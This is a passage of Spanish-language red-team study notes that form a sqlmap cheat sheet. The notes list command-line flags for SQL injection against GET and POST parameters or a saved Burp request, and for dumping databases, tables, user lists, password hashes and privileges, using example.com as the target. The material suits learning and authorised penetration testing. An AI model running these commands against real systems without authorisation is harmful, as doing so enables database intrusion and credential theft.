> For the complete documentation index, see [llms.txt](https://hacking-3.gitbook.io/barre/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-3.gitbook.io/barre/apuntes/red-team/tools/sqlmap.md).

# Sqlmap

<figure><img src="/files/IO0v4vD8FCDFrDCdJR98" alt=""><figcaption></figcaption></figure>

## Introducción

A SQLmap le tienes que pasar un url o una interceptación.&#x20;

* *En Burp Suite con click derecho puedes guardar la interceptación. Se guarda nombre.txt*

SQLmap lo que va a hacer es ejecutar todas la inyecciones necesaria para sacar info de la base de datos.

## Comandos

### **Datos**

**Interno**

```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges
```

**Datos de la base de datos**

```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```

### Lugar de inyección <a href="#lugar-de-inyeccion" id="lugar-de-inyeccion"></a>

#### Desde la captura de Burp/ZAP <a href="#desde-la-captura-de-burp-zap" id="desde-la-captura-de-burp-zap"></a>

```bash
sqlmap -r req.txt
```

#### Inyección de Solicitud GET <a href="#inyeccion-de-solicitud-get" id="inyeccion-de-solicitud-get"></a>

```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```

#### Inyección de Solicitudes POST <a href="#inyeccion-de-solicitudes-post" id="inyeccion-de-solicitudes-post"></a>

```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```

### Extras

Ignara las redirecciones

```bash
--ignore-redirects
```

Indicar la técnica que quieres que use.

```bash
--technique #Para Blind sql inyection se pone, B 
```

Indicas el parámetro.&#x20;

```bash
-p 
```

Le pides el usuario actual.&#x20;

```bash
--current-user
```

Le indicas el usuario.&#x20;

```bash
-U 
```

Le pides que busque las contraseñas.&#x20;

```bash
--passwords
```

Acepta ya cosas de las que te pide.

```bash
--batch
```

Verbose.&#x20;

```bash
-v 
```

Le indicas la tabla.

```bash
-T 
```
